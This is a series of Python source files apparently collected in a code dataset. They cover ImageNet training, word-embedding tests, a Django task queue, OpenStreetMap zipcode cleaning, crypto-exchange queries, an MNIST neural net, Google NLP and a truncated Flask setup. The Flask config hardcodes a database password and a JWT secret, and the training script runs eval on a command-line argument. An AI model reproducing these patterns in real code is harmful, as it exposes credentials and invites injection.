default='augments', help='experiment name')\nparser.add_argument('--seed', type=int, default=0, help='random seed')\nparser.add_argument('--arch', type=str, default='PCDARTS', help='which architecture to use')\nparser.add_argument('--grad_clip', type=float, default=5., help='gradient clipping')\nparser.add_argument('--label_smooth', type=float, default=0.1, help='label smoothing')\nparser.add_argument('--lr_scheduler', type=str, default='linear', help='lr scheduler, linear or cosine')\nparser.add_argument('--tmp_data_dir', type=str, default='augments', help='temp data dir')\nparser.add_argument('--note', type=str, default='try', help='note for this run')\nparser.add_argument('--world_size', type=int, default=-1)\nparser.add_argument('--resume', default='', type=str, metavar='PATH', help='path to latest checkpoint (default: none)')\nparser.add_argument('--start-epoch', default=0, type=int, metavar='N', help='manual epoch number (useful on restarts)')\n\nargs, unparsed = parser.parse_known_args()\njobid = os.environ[\"SLURM_JOBID\"]\nargs.save = '{}/{}'.format(args.save, jobid)\nutils.create_exp_dir(args.save, scripts_to_save=glob.glob('*.py'))\nlog_format = '%(asctime)s %(message)s'\n\nCLASSES = 1000\n\nclass CrossEntropyLabelSmooth(nn.Module):\n\n def __init__(self, num_classes, epsilon):\n super(CrossEntropyLabelSmooth, self).__init__()\n self.num_classes = num_classes\n self.epsilon = epsilon\n self.logsoftmax = nn.LogSoftmax(dim=1)\n\n def forward(self, inputs, targets):\n log_probs = self.logsoftmax(inputs)\n targets = torch.zeros_like(log_probs).scatter_(1, targets.unsqueeze(1), 1)\n targets = (1 - self.epsilon) * targets + self.epsilon / self.num_classes\n loss = (-targets * log_probs).mean(0).sum()\n return loss\n\n\ndef main():\n # For slurm available\n if \"SLURM_NPROCS\" in os.environ:\n # acquire world size from slurm\n args.world_size = int(os.environ[\"SLURM_NPROCS\"])\n args.rank = int(os.environ[\"SLURM_PROCID\"])\n jobid = os.environ[\"SLURM_JOBID\"]\n hostfile = os.path.join(args.save, \"dist_url.\" + jobid + \".txt\")\n if args.rank == 0:\n ip = socket.gethostbyname(socket.gethostname())\n port = find_free_port()\n args.dist_url = \"tcp://{}:{}\".format(ip, port)\n with open(hostfile, \"w\") as 
f:\n f.write(args.dist_url)\n else:\n while not os.path.exists(hostfile):\n time.sleep(5) # waite for the main process\n with open(hostfile, \"r\") as f:\n args.dist_url = f.read()\n print(\"dist-url:{} at PROCID {} / {}\".format(args.dist_url, args.rank, args.world_size))\n\n # support multiple GPU on one node\n # assume each node have equal GPUs\n ngpus_per_node = torch.cuda.device_count()\n args.world_size = ngpus_per_node * args.world_size\n mp.spawn(worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args))\n\n\ndef worker(gpu, ngpus_per_node, config_in):\n # init\n args = copy.deepcopy(config_in)\n jobid = os.environ[\"SLURM_JOBID\"]\n procid = int(os.environ[\"SLURM_PROCID\"])\n args.gpu = gpu\n\n if args.gpu is not None:\n writer_name = \"tb.{}-{:d}-{:d}\".format(jobid, procid, gpu)\n logger_name = \".{}-{:d}-{:d}.aug.log\".format(jobid, procid, gpu)\n ploter_name = \"{}-{:d}-{:d}\".format(jobid, procid, gpu)\n ck_name = \"{}-{:d}-{:d}\".format(jobid, procid, gpu)\n else:\n writer_name = \"tb.{}-{:d}-all\".format(jobid, procid)\n logger_name = \"{}-{:d}-all.aug.log\".format(jobid, procid)\n ploter_name = \"{}-{:d}-all\".format(jobid, procid)\n ck_name = \"{}-{:d}-all\".format(jobid, procid)\n\n writer = SummaryWriter(log_dir=os.path.join(args.save, writer_name))\n logger = utils.get_logger(os.path.join(args.save, logger_name))\n\n if args.dist_url == \"env://\" and args.rank == -1:\n args.rank = int(os.environ[\"RANK\"])\n\n args.rank = args.rank * ngpus_per_node + gpu\n dist.init_process_group(backend=\"nccl\", init_method=args.dist_url,\n world_size=args.world_size, rank=args.rank)\n\n np.random.seed(args.seed)\n cudnn.benchmark = True\n torch.manual_seed(args.seed)\n cudnn.enabled = True\n torch.cuda.manual_seed(args.seed)\n logger.info(\"args = %s\", args)\n logger.info(\"unparsed_args = %s\", unparsed)\n num_gpus = torch.cuda.device_count()\n genotype = eval(\"genotypes.%s\" % args.arch)\n print('---------Genotype---------')\n logger.info(genotype)\n print('--------------------------')\n model = Network(args.init_channels, CLASSES, args.layers, args.auxiliary, genotype)\n if args.gpu is not None:\n torch.cuda.set_device(args.gpu)\n # model = model.to(device)\n model.cuda(args.gpu)\n # When using a single GPU per process and per DistributedDataParallel, we need to divide\n # the batch size ourselves based on the total number of GPUs we have\n args.batch_size = int(args.batch_size / ngpus_per_node)\n args.workers = int((args.workers + ngpus_per_node - 1) / ngpus_per_node)\n # model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[config.rank])\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])\n # model = torch.nn.parallel.DistributedDataParallel(model, device_ids=None, output_device=None)\n else:\n model.cuda()\n # DistributedDataParallel will divide and allocate batch_size to all\n # available GPUs if device_ids are not set\n model = torch.nn.parallel.DistributedDataParallel(model)\n\n logger.info(\"param size = %fMB\", utils.count_parameters_in_MB(model))\n criterion = nn.CrossEntropyLoss()\n criterion = criterion.cuda()\n criterion_smooth = CrossEntropyLabelSmooth(CLASSES, args.label_smooth)\n criterion_smooth = criterion_smooth.cuda()\n\n optimizer = torch.optim.SGD(\n model.parameters(),\n args.learning_rate,\n momentum=args.momentum,\n weight_decay=args.weight_decay\n )\n best_acc_top1 = 0\n best_acc_top5 = 0\n\n if args.resume:\n if os.path.isfile(args.resume):\n logger.info(\"=> loading checkpoint 
'{}'\".format(args.resume))\n if args.gpu is None:\n checkpoint = torch.load(args.resume)\n else:\n # Map model to be loaded to specified single gpu.\n loc = 'cuda:{}'.format(args.gpu)\n checkpoint = torch.load(args.resume, map_location=loc)\n args.start_epoch = checkpoint['epoch']\n best_acc_top1 = checkpoint['best_acc_top1']\n model.module.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n logger.info(\"=> loaded checkpoint '{}' (epoch {})\"\n .format(args.resume, checkpoint['epoch']))\n else:\n logger.info(\"=> no checkpoint found at '{}'\".format(args.resume))\n data_dir = os.path.join(args.tmp_data_dir, 'imagenet')\n traindir = os.path.join(data_dir, 'train')\n validdir = os.path.join(data_dir, 'valid')\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n train_data = dset.ImageFolder(\n traindir,\n transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ColorJitter(\n brightness=0.4,\n contrast=0.4,\n saturation=0.4,\n hue=0.2),\n transforms.ToTensor(),\n normalize,\n ]))\n valid_data = dset.ImageFolder(\n validdir,\n transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize,\n ]))\n\n train_sampler = data.distributed.DistributedSampler(train_data,\n num_replicas=args.world_size,\n rank=args.rank)\n valid_sampler = data.distributed.DistributedSampler(valid_data,\n num_replicas=args.world_size,\n rank=args.rank)\n train_queue = torch.utils.data.DataLoader(\n train_data, batch_size=args.batch_size, sampler=train_sampler, pin_memory=True, num_workers=args.workers)\n\n valid_queue = torch.utils.data.DataLoader(\n valid_data, batch_size=args.batch_size, sampler=valid_sampler, pin_memory=True, num_workers=args.workers)\n\n # scheduler = torch.optim.lr_scheduler.StepLR(optimizer, args.decay_period, gamma=args.gamma)\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, float(args.epochs))\n\n lr = args.learning_rate\n for epoch in range(args.start_epoch, args.epochs):\n valid_sampler.set_epoch(epoch)\n train_sampler.set_epoch(epoch)\n if args.lr_scheduler == 'cosine':\n scheduler.step()\n current_lr = scheduler.get_lr()[0]\n elif args.lr_scheduler == 'linear':\n current_lr = adjust_lr(optimizer, epoch)\n else:\n print('Wrong lr type, exit')\n sys.exit(1)\n logger.info('Epoch: %d lr %e', epoch, current_lr)\n if epoch < 5 and args.batch_size > 256:\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr * (epoch + 1) / 5.0\n logger.info('Warming-up Epoch: %d, LR: %e', epoch, lr * (epoch + 1) / 5.0)\n if num_gpus > 1:\n model.module.drop_path_prob = args.drop_path_prob * epoch / args.epochs\n else:\n model.drop_path_prob = args.drop_path_prob * epoch / args.epochs\n epoch_start = time.time()\n train_acc, train_obj = train(train_queue, model, criterion_smooth, optimizer, epoch, writer, logger)\n logger.info('Train_acc: %f', train_acc)\n\n valid_acc_top1, valid_acc_top5, valid_obj = infer(valid_queue, model, criterion, logger)\n logger.info('Valid_acc_top1: %f', valid_acc_top1)\n logger.info('Valid_acc_top5: %f', valid_acc_top5)\n epoch_duration = time.time() - epoch_start\n logger.info('Epoch time: %ds.', epoch_duration)\n is_best = False\n if valid_acc_top5 > best_acc_top5:\n best_acc_top5 = valid_acc_top5\n if valid_acc_top1 > best_acc_top1:\n best_acc_top1 = valid_acc_top1\n is_best = True\n if args.rank == 0:\n utils.save_checkpoint({\n 'epoch': epoch + 1,\n 'state_dict': 
model.module.state_dict(),\n 'best_acc_top1': best_acc_top1,\n 'optimizer': optimizer.state_dict(),\n }, is_best, args.save)\n # get data with meta info\n\n \ndef adjust_lr(optimizer, epoch):\n # Smaller slope for the last 5 epochs because lr * 1/250 is relatively large\n if args.epochs - epoch > 5:\n lr = args.learning_rate * (args.epochs - 5 - epoch) / (args.epochs - 5)\n else:\n lr = args.learning_rate * (args.epochs - epoch) / ((args.epochs - 5) * 5)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n return lr \n\n\ndef train(train_queue, model, criterion, optimizer, epoch, writer, logger):\n global start_time\n objs = utils.AvgrageMeter()\n top1 = utils.AvgrageMeter()\n top5 = utils.AvgrageMeter()\n batch_time = utils.AvgrageMeter()\n model.train()\n cur_step = epoch * len(train_queue)\n\n for step, (input, target) in enumerate(train_queue):\n target = target.cuda(non_blocking=True)\n input = input.cuda(non_blocking=True)\n b_start = time.time()\n optimizer.zero_grad()\n logits, logits_aux = model(input)\n loss = criterion(logits, target)\n if args.auxiliary:\n loss_aux = criterion(logits_aux, target)\n loss += args.auxiliary_weight*loss_aux\n\n loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), args.grad_clip)\n optimizer.step()\n batch_time.update(time.time() - b_start)\n prec1, prec5 = utils.accuracy(logits, target, topk=(1, 5))\n n = input.size(0)\n objs.update(loss.data.item(), n)\n top1.update(prec1.data.item(), n)\n top5.update(prec5.data.item(), n)\n writer.add_scalar('train/loss', loss.item(), cur_step)\n writer.add_scalar('train/top1', prec1.item(), cur_step)\n writer.add_scalar('train/top5', prec5.item(), cur_step)\n\n if step % args.report_freq == 0:\n end_time = time.time()\n if step == 0:\n duration = 0\n start_time = time.time()\n else:\n duration = end_time - start_time\n start_time = time.time()\n logger.info('TRAIN Step: %03d Objs: %e R1: %f R5: %f Duration: %ds BTime: %.3fs',\n step, objs.avg, top1.avg, top5.avg, duration, batch_time.avg)\n\n return top1.avg, objs.avg\n\n\ndef infer(valid_queue, model, criterion, logger):\n objs = utils.AvgrageMeter()\n top1 = utils.AvgrageMeter()\n top5 = utils.AvgrageMeter()\n model.eval()\n\n for step, (input, target) in enumerate(valid_queue):\n input = input.cuda()\n target = target.cuda(non_blocking=True)\n with torch.no_grad():\n logits, _ = model(input)\n loss = criterion(logits, target)\n\n prec1, prec5 = utils.accuracy(logits, target, topk=(1, 5))\n n = input.size(0)\n objs.update(loss.data.item(), n)\n top1.update(prec1.data.item(), n)\n top5.update(prec5.data.item(), n)\n\n if step % args.report_freq == 0:\n end_time = time.time()\n if step == 0:\n duration = 0\n start_time = time.time()\n else:\n duration = end_time - start_time\n start_time = time.time()\n logger.info('VALID Step: %03d Objs: %e R1: %f R5: %f Duration: %ds', step, objs.avg, top1.avg, top5.avg, duration)\n\n return top1.avg, top5.avg, objs.avg\n\n\nif __name__ == '__main__':\n main() \n","sub_path":"train_imagenet.py","file_name":"train_imagenet.py","file_ext":"py","file_size_in_byte":16173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"111570895","text":"import numpy as np\nimport GensimEmbedding as emb\nfrom NewPlot import Plot \nclass GensimEmbeddingTester(object):\n\t\"\"\"docstring for GensimEmbeddingTester\"\"\"\n\t\n\tdef __init__(self):\n\t\tsuper(GensimEmbeddingTester, self).__init__()\n\t\n\tdef words_from_5concepts_dendrogram(self):\n\t\tfrom 
ConceptManager import ConceptManager as CM\n\n\t\twords = list()\n\n\t\tcm_size = 5\n\t\tcm = CM(cm_size)\n\t\tfor i in range(cm_size):\n\t\t\tfor word in cm.conceptList[i].fullConcept():\n\t\t\t\tif word not in words:\n\t\t\t\t\tif word in emb.model.wv.index2word:\n\t\t\t\t\t\twords.append(word)\n\n\t\tdist_matrix = np.ndarray(shape=(len(words),len(words)))\n\t\tfor i in range(len(words)):\n\t\t\tfor j in range(len(words)):\n\t\t\t\tdist_matrix[i][j] = emb.model.similarity(words[i],words[j])\n\n\t\tPlot().dendrogram(dist_matrix,words)\n\n\t\t\n\n\ndef main():\n\tGensimEmbeddingTester().words_from_5concepts_dendrogram()\n\nif __name__ == '__main__':\n\tmain()\n\t\t","sub_path":"Tester.py","file_name":"Tester.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"578763926","text":"import datetime\nimport sys\nimport threading\n\nimport rollbar\nfrom django.conf import settings\nfrom django.core.signals import request_finished\n\n\nthreadlocal = threading.local()\n\ndef process(queue):\n if settings.DEBUG or settings.STAGING:\n now = datetime.datetime.now()\n print('Async tasks: {} to process'.format(len(queue)))\n\n while queue:\n func, args, kwargs = queue.pop()\n try:\n func(*args, **kwargs)\n except Exception as e:\n if settings.DEBUG or settings.STAGING:\n raise e\n rollbar.report_exc_info(sys.exc_info())\n\n if settings.DEBUG or settings.STAGING:\n delta = datetime.datetime.now() - now\n print('Completed in {}'.format(delta))\n\ndef get_queue():\n queue = getattr(threadlocal, 'ppqueue', None)\n if queue is None:\n queue = []\n setattr(threadlocal, 'ppqueue', queue)\n return queue\n\ndef push_task(func, args, kwargs):\n get_queue().append((func, args, kwargs))\n\ndef after_request(sender, **kwargs):\n queue = get_queue()\n if not queue:\n return\n threading.Thread(target=process, args=(queue, )).start()\n setattr(threadlocal, 'ppqueue', [])\n\n\nrequest_finished.connect(after_request)\n\ndef run_after_request(func):\n def wrap(*args, **kwargs):\n push_task(func, args, kwargs)\n return wrap\n","sub_path":"pinecast/post_processing.py","file_name":"post_processing.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"385374885","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport xml.etree.cElementTree as ET\nfrom collections import defaultdict\nimport pprint\nimport re\n\n# indicate file to be read\nosmfile = \"sample.osm\"\n\n# create the dict to put zipcodes into\ndef add_to_dict(data_dict, item):\n data_dict[item] += 1\n\n# find the zipcodes\ndef get_postcode(element):\n for tag in element:\n if (tag.attrib['k'] == \"addr:postcode\") or (tag.attrib['k'].find('zip') != -1):\n postcode = tag.attrib['v']\n return postcode\n\n# update zipcodes\ndef update_postal(postcode):\n z_re = re.compile(r'\\d{5}')\n z = postcode\n postcode = z_re.findall(z)[0]\n return postcode\n\n\n# aput the list of zipcodes into dict\ndef audit(osmfile):\n osm_file = open(osmfile, \"r\")\n data_dict = defaultdict(int)\n for event, elem in ET.iterparse(osm_file, events=(\"start\",)):\n\n if elem.tag == \"node\" or elem.tag == \"way\":\n for tag in elem.iter(\"tag\"):\n if get_postcode(elem.iter(\"tag\")):\n postcode = get_postcode(elem.iter(\"tag\"))\n postcode = update_postal(postcode)\n add_to_dict(data_dict, postcode)\n return data_dict\n\n\n# test the zipcode audit and dict creation\ndef test():\n cleanzips = 
audit(osmfile)\n pprint.pprint(dict(cleanzips))\n\n\n\nif __name__ == '__main__':\n test()\n","sub_path":"DAND/OpenStreetMap/audit_zip.py","file_name":"audit_zip.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"418281615","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 7 00:35:42 2020\r\n\r\n@author: themr\r\n\"\"\"\r\n\r\nimport ccxt\r\n\r\n#print(ccxt.exchanges) \r\n\"\"\"\r\n# For now this is a list of exchanges to use. There could be a first loop over\r\nall the exchanges to check the price of bitcoin/eth, for example, and to see\r\nhow the code reacts when an exchange is unavailable and, in that case, how to\r\nhandle the errors. All of this should then be run in parallel, with several\r\nmachines querying several exchanges at the same time.\r\n\r\nCould I also write such a service in C and then use it from Python?\r\nI think so.\r\n\r\n\"\"\"\r\nprint(\"\")\r\n\r\n\r\n\r\ndef getPairs_from_exchange(exchange):\r\n curr_list = []\r\n markets = exchange.load_markets()\r\n for i in markets:\r\n if i.find(\"/\")>=0:\r\n curr_list.append((i.split(\"/\")[0],i.split(\"/\")[1])) \r\n return curr_list\r\n\r\ndef getPairs_from_market(markets):\r\n curr_list = []\r\n for i in markets:\r\n if i.find(\"/\")>=0:\r\n curr_list.append((i.split(\"/\")[0],i.split(\"/\")[1])) \r\n return curr_list\r\n\r\ndef sort_currencies_pairs_by_left(curr_list, curr):\r\n curr_list.sort(key=lambda tup: tup[0]) \r\n return curr_list\r\n\r\ndef sort_currencies_pairs_by_right(curr_list, curr):\r\n curr_list.sort(key=lambda tup: tup[1]) \r\n return curr_list\r\nexchange = ccxt.okcoin() # default id\r\nokcoin1 = ccxt.okcoin({ 'id': 'okcoin1' })\r\nokcoin2 = ccxt.okcoin({ 'id': 'okcoin2' })\r\n\r\nid = 'btcchina'\r\n#btcchina = eval ('ccxt.%s ()' % id)\r\ncoinbasepro = getattr(ccxt, 'coinbasepro')\r\n# print(type(coinbasepro()))\r\nc_describe = coinbasepro().describe()\r\n\r\n\r\nk = ccxt.kraken()\r\nk_describe = k.describe()\r\n\r\ncurr_list = []\r\nk_markets = k.load_markets()\r\nfor i in k_markets:\r\n if i.find(\"/\")>=0:\r\n curr_list.append((i.split(\"/\")[0],i.split(\"/\")[1]))\r\nprint(curr_list)\r\nl = sort_currencies_pairs_by_right(curr_list, \"USD\")\r\nprint(\"\")\r\nprint(l)\r\nprint(\"\")\r\n#(k.markets['BTC/USD'] )\r\nprint(k.fetch_ticker('BTC/USD')[\"info\"])\r\n# from variable id\r\nexchange_id = 'binance'\r\nexchange_class = getattr(ccxt, exchange_id)\r\nprint(type(exchange_class()))\r\nexchange = exchange_class({\r\n 'apiKey': 'YOUR_API_KEY',\r\n 'secret': 'YOUR_SECRET',\r\n 'timeout': 30000,\r\n 'enableRateLimit': True,\r\n})\r\n","sub_path":"learnccct.py","file_name":"learnccct.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"601251886","text":"#!/usr/bin/env python\nimport os\n\n\nclass Constants:\n BRICSCAD_APP_NAME = \"BricscadApp.AcadApplication\"\n AUTOCAD_APP_NAME = \"AutoCAD.Application\"\n APP_NAME = BRICSCAD_APP_NAME # switch to the other CAD app here.\n\n SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))\n PROJ_ROOT = os.path.dirname(SCRIPT_DIR)\n OUTPUT_DIR = os.path.join(PROJ_ROOT, \"output\")\n INPUT_DIR = os.path.join(PROJ_ROOT, \"input\")\n TEST_DIR = os.path.join(PROJ_ROOT, \"test\")\n TESTDATA_DIR = os.path.join(TEST_DIR, \"testdata\")\n\n BAK_FILES = \".bak\"\n DWG_FILES = \".dwg\"\n DXF_FILES = \".dxf\"\n CSV_FILES = 
\".csv\"\n","sub_path":"python/Architecture/CAD/project_tower/src/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"563525107","text":"def nlp_analysis(credentials, project, paragraph_text=\"wallstreetjournal\"):\n import pandas as pd\n import numpy as np\n from google.cloud import language_v1\n text = paragraph_text\n client =language_v1.LanguageServiceClient()\n document = {\"content\": text,\n \"type_\":language_v1.Document.Type.PLAIN_TEXT,\"language\": \"en\"}\n \n # Available values: NONE, UTF8, UTF16, UTF32\n encoding_type = language_v1.EncodingType.UTF8\n\n response = client.analyze_entities(request = {'document': document, 'encoding_type': encoding_type})\n \n entity_name=[]\n entity_type=[]\n entity_salience=[]\n\n for entity in response.entities:\n entity_name.append(entity.name)\n entity_type.append(language_v1.Entity.Type(entity.type_).name)\n entity_salience.append(entity.salience)\n \n result = pd.DataFrame({\"entity_name\":entity_name, \"entity_salience\":entity_salience})\n result['entity_salience']=result['entity_salience']*1000\n result['entity_salience']=result['entity_salience'].astype(int)\n result=result.to_dict()\n return result","sub_path":"google_nlp.py","file_name":"google_nlp.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"363455956","text":"from random import uniform,seed\nimport numpy as np\nfrom math import exp\nimport matplotlib.pyplot as mpl\n\n#Settings-------\nTRAINING_FILE = 'training_data/mnist_train_0_4.csv'\nTESTING_FILE = 'testing_data/mnist_test_0_4.csv'\n\nALPHA = .5\nEPOCHS = 5\nNUM_INPUTS = 784\nHIDDEN_LAYERS = [50]\nNUM_OUTPUTS = 5\n\nactivation_function = 'sigmoid'\n\n\n\nclass NeuralNet:\n\n\tdef __init__(self, dimensions, alpha = .5, activation_function = 'sigmoid', display_progess = False):\n\n\t\tself.alpha = alpha\n\t\tself.outputs = None\n\t\tself.layers = []\n\t\tself.display_progess = display_progess\n\t\tif activation_function == 'sigmoid':\n\t\t\tself.fn = self.sigmoid\n\t\t\tself.fnp = self.sigmoid_prime\n\t\telif activation_function == 'rectifier':\n\t\t\tself.fn = self.rectifier\n\t\t\tself.fnp = self.rectifier_prime\t\t\n\t\t\t\t\n\t\tfor i in range(1,len(dimensions)):\n\t\t\tself.layers.append(np.array([[uniform(0,1)/(dimensions[i-1]) for _ in range(dimensions[i])] for _ in range(dimensions[i-1])]))\n\n\tdef rectifier(self, x):\n\t\treturn max(0, x)\n\n\tdef rectifier_prime(self, x):\n\t\treturn 1 if x > 0 else 0\n\n\tdef sigmoid(self, x):\n\t\tif x > 50:\n\t\t\treturn .999\n\t\telif x < -50:\n\t\t\treturn .001\n\t\treturn 1/(1+exp(-x))\n\n\tdef sigmoid_prime(self, x):\n\t\treturn (1-x)*x\n\n\tdef predict(self, data):\n\n\t\tself.outputs = [data]\n\t\tfor layer in self.layers: \n\t\t\tself.outputs.append(np.matrix(np.apply_along_axis(self.fn,0, np.dot(self.outputs[-1], layer))))\n\t\t\n\t\tself.outputs.pop(0)\n\t\treturn self.outputs[-1]\n\n\tdef train(self, training_data):\n\t\t#training data is in the format:\n\t\t#\t[( np.matrix([outputs]), np.matrix([datapoints])), ...]\n\t\tk = 1\n\t\tfor answer, data in training_data:\n\n\t\t\tself.predict(data)\n\t\t\t#print(answer, self.outputs[-1].item(0), self.fnp(self.outputs[-1].item(0)), answer-self.outputs[-1])\n\t\t\toutput_delta = np.multiply( np.apply_along_axis(self.fnp, 0, self.outputs[-1]),\n\t\t\t\t(answer-self.outputs[-1]) )\n\n\t\t\tdeltas = 
[output_delta]\n\n\t\t\t#Find deltas\n\t\t\tfor i in range(len(self.layers)-1,0,-1):\n\t\t\t\tlayer = self.layers[i]\n\t\t\t\trecent_delta = deltas[0]\n\t\t\t\tweight_times_delta = np.dot(layer, np.transpose(recent_delta))\n\n\t\t\t\tdeltas.insert(0, \n\t\t\t\t\tnp.multiply( # multiplies g'(in) by the sum of weight times delta for all weights and deltas\n\t\t\t\t\t\tnp.apply_along_axis( #calculates g'(in) by applying our prime to the outout at each layer\n\t\t\t\t\t\t\tself.fnp, 0, self.outputs[i-1]\n\t\t\t\t\t\t\t\t\t), np.transpose(weight_times_delta)\n\t\t\t\t\t\t))\n\n\t\t\t#Weight update\n\t\t\tfor i in range(len(self.outputs)-2,-1,-1):\n\t\t\t\tchange = np.multiply(np.transpose(self.outputs[i]), deltas[i+1]) * self.alpha #alpha * delta * input\n\t\t\t\tself.layers[i+1] = self.layers[i+1]+change\n\n\t\t\tchange = np.multiply(np.transpose(np.matrix(data)), deltas[0])*self.alpha\n\t\t\tself.layers[0] = self.layers[0] + change\n\n\t\t\tif self.display_progess: print(k)\n\t\t\tk += 1\n\n\tdef display_weights(self):\n\t\tfor layer in self.layers:\n\t\t\tprint('\\t'.join([str(neuron) for neuron in layer]))\n\n\tdef display_architecture(self):\n\t\tfor layer in self.layers:\n\t\t\tprint(layer.shape)\n\n\tdef display_outputs(self):\n\t\tfor output in self.outputs:\n\t\t\tprint('\\t'.join(str(o) for o in output))\n\n\ndef import_data(fn):\n\n\twith open(fn, 'r') as f:\n\t\td = [[int(e) for e in l.split(',')] for l in f.readlines()]\n\n\treturn d\n\ndef main():\n\n\tnn = NeuralNet([NUM_INPUTS] + HIDDEN_LAYERS + [NUM_OUTPUTS], \n\t\talpha = ALPHA, \n\t\tactivation_function = activation_function,\n\t\t)\n\n\t#-------------TRAINING------------------\n\ttraining_data = import_data(TRAINING_FILE)\n\tfor m in range(EPOCHS):\n\t\tprint('EPOCH', m)\n\t\tnn.train([[np.matrix([i == line[0] for i in range(NUM_OUTPUTS)]),np.matrix(line[1:]) ] for line in training_data])\n\n\t#-------------TESTING-------------------\n\ttesting_data = import_data(TESTING_FILE)\n\thit = 0\n\tfor i in range(len(testing_data)):\n\t\tp = np.matrix.tolist(nn.predict(np.matrix(testing_data[i][1:])))[0]\n\t\tp = p.index(max(p))\n\t\tprint(testing_data[i][0], p)\n\t\thit += p == int(testing_data[i][0])\n\n\tprint('ACCURACY: ', hit/len(testing_data)*100, '%', sep ='')\n\nif __name__ == '__main__':\n\t\tmain()\t\n\n\n\n","sub_path":"neural_nets/neural_nets.py","file_name":"neural_nets.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"148581653","text":"# -*- coding:utf-8 -*-\n\nfrom odoo import models, fields, api\nimport logging\n_logger = logging.getLogger(__name__)\n\n\nclass AccountPayment(models.Model):\n _inherit = 'account.payment'\n\n bsd_employee_payroll_id = fields.Many2one('bsd.employee.payroll', string='Bảng lương')\n\n @api.model\n def create(self,vals):\n _logger.debug(\"thanh toán lương\")\n _logger.debug(vals)\n pay = super(AccountPayment, self).create(vals)\n self.env['bsd.employee.payroll'].search([('id', '=', pay.bsd_employee_payroll_id.id)]).write({\n 'bsd_payment_id': pay.id,\n 'bsd_payment_date': pay.payment_date,\n 'state': 'payment'\n })\n _logger.debug(pay)\n return pay\n\n @api.model\n def default_get(self, default_fields):\n rec = super(AccountPayment, self).default_get(default_fields)\n _logger.debug(default_fields)\n return 
rec\n","sub_path":"bsd_employee_extend/models/account_payment.py","file_name":"account_payment.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"275197","text":"import json, os\nfrom flask import Flask, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate, MigrateCommand\nfrom flask_script import Manager\nfrom flask_restful import Resource, Api\nimport logging\nfrom logging.handlers import RotatingFileHandler\nimport datetime\nfrom functools import wraps\nfrom flask_jwt_extended import JWTManager, verify_jwt_in_request, get_jwt_claims\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n# u_name = os.environ[\"THIS_U_NAME\"]\n# password = os.environ[\"THIS_PASSWORD\"]\n# endpoint = os.environ[\"THIS_ENDPOINT\"]\n# db_test = os.environ[\"THIS_DB_TEST\"]\n# db_dev = os.environ[\"THIS_DB_DEV\"]\n\napp.config['APP_DEBUG'] = True\n\n############################\n# JWT #\n############################\n\napp.config['JWT_SECRET_KEY'] = 'SFsieaaabjsdalkjdi32jdijd32657j'\napp.config['JWT_ACCESS_TOKEN_EXPIRES'] = datetime.timedelta(days = 1)\n\njwt = JWTManager(app)\n\n###########################\n# Database #\n###########################\n\ntry:\n env = os.environ.get('FLASK_ENV', 'development')\n if env == 'testing':\n app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://hamdiranu:8hamdiranu9@0.0.0.0:3306/db_test_kiostiktest'\n else:\n app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://hamdiranu:8hamdiranu9@0.0.0.0:3306/db_kiostiktest'\n\nexcept Exception as e:\n raise e \n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndef admin_required(fn):\n @wraps(fn)\n def wrapper(*args,**kwargs):\n verify_jwt_in_request()\n claims = get_jwt_claims()\n if not claims['isadmin']:\n return {'status': 'FORBIDDEN', 'message': 'admin Only!'}, 403\n else:\n return fn(*args, **kwargs)\n return wrapper\n\ndb = SQLAlchemy(app)\nmigrate = Migrate(app, db)\nmanager = Manager(app)\nmanager.add_command('db', MigrateCommand)\n\n\n######################\n# Import Blueprint #\n######################\n\n@app.after_request\ndef after_request(response):\n try:\n requestData = request.get_json()\n except Exception as e:\n requestData = request.args.to_dict()\n if response.status_code == 200:\n app.logger.info(\"REQUEST_LOG\\t%s\",json.dumps({\n 'status_code':response.status_code,\n 'method':request.method,\n 'code':response.status,\n 'uri':request.full_path,\n 'request': request.args.to_dict(),\n 'response': json.loads(response.data.decode('utf-8'))\n })\n )\n\n elif response.status_code == 501:\n app.logger.error(\"REQUEST_LOG\\t%s\",json.dumps({\n 'status_code':response.status_code,\n 'method':request.method,\n 